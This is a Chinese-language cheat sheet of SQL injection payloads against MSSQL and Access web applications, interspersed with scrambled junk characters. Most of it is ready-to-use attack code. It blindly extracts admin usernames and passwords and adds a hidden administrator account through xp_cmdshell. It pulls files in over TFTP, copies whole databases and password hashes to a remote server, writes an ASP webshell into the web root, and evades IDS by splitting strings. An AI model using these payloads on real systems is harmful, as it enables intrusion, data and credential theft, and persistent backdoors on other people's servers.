SQL注入语句2

admin

1..判断有无注入点
; and 1=1 and 1=2

6 n( y2 O+ R  l1 l7 g8 {
& l4 G8 _; H2 E8 v2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
( Q6 k" l, A8 v* cand 0<>(select count(*) from admin) ---判断是否存在admin这张表
! o8 p0 u/ P, l( j
: h9 I) W5 a2 ~) I
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有 and (select count(列名) from 表名)>0
8 v7 g4 u  x  [4 w: d; Z

4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
& X3 G+ J% Q) ^2 v% j0 mand 1=(select count(*) from admin where len(*)>0)--
, X% }- x4 q) {, b' Dand 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)

5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
and 1=(select count(*) from admin where len(*)>0)
6 Q" T- W) z) G0 Z. pand 1=(select count(*) from admin where len(name)>6) 错误
- z7 J- J6 b; X# \9 O* oand 1=(select count(*) from admin where len(name)>5) 正确 长度是6
4 U/ `# v0 ^/ J7 h; t: w2 wand 1=(select count(*) from admin where len(name)=6) 正确
: j" h) [+ R  O+ {
and 1=(select count(*) from admin where len(password)>11) 正确
, e2 D6 |3 n/ P# Z+ ^; @and 1=(select count(*) from admin where len(password)>12) 错误 长度是12
and 1=(select count(*) from admin where len(password)=12) 正确
0 _- o- E3 M, |2 h; {猜长度还有 and (select top 1 len(username) from admin)>5
! E  Y7 t, m1 @8 Q+ z

6.猜解字符
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
, h& R  R! n- A$ q5 {) J% E" \3 t' Hand 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
: F5 R' J1 F! E. a. C这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
; insert into users values( 666, attacker, foobar, 0xffff )--
2 q! }' M$ F' U& `& C- V" @
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
! @3 Z, y: K( P2 ]UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
* N. q& j0 T) o9 C4 E1 FUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--

看服务器打的补丁=出错了打了SP4补丁
7 G' j" L& k. q$ q# `$ Q/ f2 cand 1=(select @@VERSION)--

0 k, y( u2 \5 n4 _看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
" r% V/ a. A9 t1 }% d& X
+ \# _6 d5 T1 e7 d判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）
and sa=(SELECT System_user)--
% O0 L3 E& R) s% R, @and user_name()=dbo--
and 0<>(select user_name()--
( o$ q' l* z2 Y  P  j5 w1 ?0 i5 }& r
看xp_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
1 {8 F$ R9 S, J! t% I: z
$ P- x5 c  Z, V* y8 Txp_cmdshell被删除，恢复,支持绝对路径的恢复
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
6 X! c+ r  U2 M$ w;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--

反向PING自己实验
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--
+ D+ w( a# U4 s+ m( Q7 }6 ~
加帐号
; @4 v* j; z" R% c5 {;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--

创建一个虚拟目录E盘：
3 s( P2 O( _/ H3 r( p) c;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"--

. N- W5 m( }  l$ o9 P3 {/ ?访问属性：（配合写入一个webshell）
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
  G1 ^7 {. Q; f
. e  `8 O! R8 i- h4 U- `
MSSQL也可以用联合查询
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用)

1 [* B5 _; ~1 z( b0 ^; @  P: N# T# W
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
' {( t. i* X- ~6 O0 z
: q$ t# i/ o- w, K
4 F/ z. b( `- n
得到WEB路径
( M& _+ {! y7 l  F2 }7 i7 Y: Z;create table [dbo].[swap] ([swappass][char](255));--
- t: i2 i3 y- k  N1 z* v; k; Jand (select top 1 swappass from swap)=1--
: K2 r, G9 H9 e/ N4 P: |8 T$ q;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
/ O6 a( C2 @+ A;use ku1;--
( \* C# ]4 {2 l, h" j) L- O;create table cmd (str image);-- 建立image类型的表cmd

存在xp_cmdshell的测试过程：
: a* S6 b% _; o$ X6 c;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
: S" A4 ?$ W- V8 x6 \: w;exec master.dbo.sp_password null,jiaoniang$,1866574;--
;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
6 i7 K& {" F/ t0 v2 h2 Dexec master..xp_servicecontrol start, schedule 启动服务
/ p3 f0 [6 e- h; P+ m& Hexec master..xp_servicecontrol start, server
; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
6 ]! s9 O, E# \% @/ E: D;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
6 m2 _+ t3 _! j( n! p
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
5 ?" Y9 k$ C& O- N5 a# A4 Q;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
- L/ j$ l3 S% B. M如果被限制则可以。
6 Z5 O7 n) D: O/ T; ?, Wselect * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
+ Z  d1 Y" G- S. V- e8 o
查询构造：
SELECT * FROM news WHERE id=... AND topic=... AND .....
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
" J# z/ i$ w& I" x, sselect 123;--
" i, b% P" r6 t;use master;--
! M& |& k0 x/ |- p( j:a or name like fff%;-- 显示有一个叫ffff的用户哈。
) }: u3 V9 }- m7 I9 i) z0 V5 u3 iand 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
5 i4 Z$ f7 W$ N;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
% k  O- H# w/ r7 v) s;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
; Y- v4 R& l. z7 E5 X0 o' V;update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
4 X! O+ \# F( p/ G通过查看ffff的用户资料可得第一个用表叫ad
% G4 X! c/ C( h! p% n然后根据表名ad得到这个表的ID 得到第二个表的名字

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
insert into users values( 667,123,123,0xffff)--
insert into users values ( 123, admin--, password, 0xffff)--
, W; {/ z% o8 l$ {# s;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access数据库

; V& J7 R. G" Z) [+ z枚举出数据表名
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
这是将第一个表名更新到aaa的字段处。
) J* V4 [! W& s; {( S3 o读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>刚才得到的表名）。
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
1 _5 J6 M6 w, c5 C' E  R  j然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表，一个个的读出，直到没有为止。
读字段是这样：
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
5 }! z! E6 Q( _+ J0 ?然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
, z/ Q) E- C! n" v6 l;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
8 j1 Y# g& `) _" b" K- ?% f然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名

[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]
5 q4 ]# Z' A7 e2 }update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
& }  q+ V5 \) c4 l- T: G  W' S2 x1 r
[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]
8 z+ z3 x9 I- a. {; ^' Dupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
& u* m2 q$ \- b/ J/ c;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
9 z/ J. }, r6 @) Z$ H) o
1、 开启远程数据库
基本语法
, Q4 t3 s9 S. P9 R8 o+ \select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
; n# J. L- l3 k  O" h$ r参数: (1) OLEDB Provider name
2 ~2 }( q$ m1 j" M2 X2、 其中连接字符串参数可以是任何端口用来连接,比如
( D- a! ?6 r5 D$ o3 I! hselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
. w5 C' V8 ^/ }6 D) R3 p9 G3.复制目标主机的整个数据库insert所有远程表到本地表。

基本语法：
/ Z% k9 l7 q. w  Tinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
8 I( S" G& ]) }- U' d这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：
8 l' }# K& Z- c2 `5 {insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
select * from master.dbo.sysdatabases
" S. m+ c. m; K: g; E4 Q! E) N" dinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
select * from user_database.dbo.sysobjects
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
" m5 ]1 R+ z5 H0 O: qselect * from user_database.dbo.syscolumns
复制数据库：
& q% S( _/ ]! e# t& w' @insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
7 H9 u) d& X5 P& t) p1 ~: Dinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2
" o4 A2 K* n2 ?# h/ F  [7 r; v7 g
2 p) H* V; Z( W复制哈西表（HASH）登录密码的hash存储于sysxlogins中。方法如下：
2 q' [( \' c- T, Sinsert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
2 R# i, H9 i$ k2 J, [2 U得到hash之后，就可以进行暴力破解。
1 l4 a1 Q9 o! A+ `; K
' k" d- P, ^3 x遍历目录的方法： 先创建一个临时表：temp
; v3 y+ \" q1 W# l6 n$ G& K% X0 S;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
- a+ N7 e, w( ]: l;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
( j0 B9 T) o1 o. O& n, S;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
, w1 Q/ {$ L1 v2 G6 u;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- （xp_dirtree适用权限PUBLIC）
: g2 f8 i- E7 X写入表：
1 e& D! a3 Y% {! X. c语句1：and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
语句2：and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
. w& I/ B3 B. I) J4 H1 U语句3：and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
0 D+ J! t* y4 m7 X5 B  _语句4：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
) w% X; _- M  E% }4 `语句5：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
$ g- y. I- Q; H! W8 f2 @3 s) B语句6：and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
' Z) o0 ?" Y! F语句7：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句8：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句9：and 1=(SELECT IS_MEMBER(db_owner));--
- _1 c7 J8 h) |# R; G( a
$ j, Z: }) V, l* d1 H把路径写到表中去：
2 s. ?7 x5 T& e;create table dirs(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
and 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
8 t1 b7 ?9 I6 ?# k$ j; h;create table dirs1(paths varchar(100), id int)--
;insert dirs exec master.dbo.xp_dirtree e:\web--
and 0<>(select top 1 paths from dirs1)--

把数据库备份到网页目录：下载
" k; D* X! u7 g+ g& M, U;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
3 b; ^' w! E7 D& L/ k" Y
and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
2 o) @0 H4 h: [% f. w7 cand 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
0 `1 f: h( A: ], @+ kand 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
( c# }9 v+ z2 ~8 B+ E3 M6 ]$ V. i
-=- wscript.shell example -=-
" W" T# j$ w2 K$ Ydeclare @o int
exec sp_oacreate wscript.shell, @o out
" v( l" r* N/ b6 Iexec sp_oamethod @o, run, NULL, notepad.exe
% V' {; C0 ?; ^/ Q; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
# H8 b4 T  T; V+ U
8 j, W3 `/ v# [; b. l( G7 o  t3 Z1 Hdeclare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate scripting.filesystemobject, @o out
( P# _  h- T, j4 C) E; _3 _3 xexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
0 \% D& ^7 H5 D: _0 Fexec @ret = sp_oamethod @f, readline, @line out
while( @ret = 0 )
begin
1 B* _* i/ d8 g4 [8 M5 r  K7 f( @print @line
& z3 g; X9 Y0 g; J5 G+ {2 Q9 yexec @ret = sp_oamethod @f, readline, @line out
end
/ y0 s4 z; O" _8 X/ C
declare @o int, @f int, @t int, @ret int
" J) I' }$ ~. @; ~exec sp_oacreate scripting.filesystemobject, @o out
1 e( w6 J% B2 x) b: F# ]0 Lexec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
1 A/ u7 w" _* r4 [, v<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
5 y0 a; p9 V4 _. l6 ]
declare @o int, @ret int
exec sp_oacreate speech.voicetext, @o out
  C+ U/ V2 ?+ @! dexec sp_oamethod @o, register, NULL, foo, bar
9 I) e  P5 k/ z' `7 W5 z& ?8 yexec sp_oasetproperty @o, speed, 150
exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
. T, m, r. e4 ]% K  `, r3 ^waitfor delay 00:00:05
# c$ d* T/ @% G; X4 e' Q+ g6 K1 ^
7 G: G9 J# ~9 }* A" W; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
6 c( a2 y/ J* N. u4 q( n9 A
2 z& l9 D' ~$ F; X% J" Uxp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。
create table dirs(paths varchar(100), id int)
+ m' r1 h& q1 v+ {; L建表，这里建的表是和上面xp_dirtree相关连，字段相等、类型相同。
' s3 G5 I+ @6 r( S! Z( _# ~8 V5 ?* E1 ?insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,一步步达到我们想要的信息！
, B3 K3 A( r" q, k: q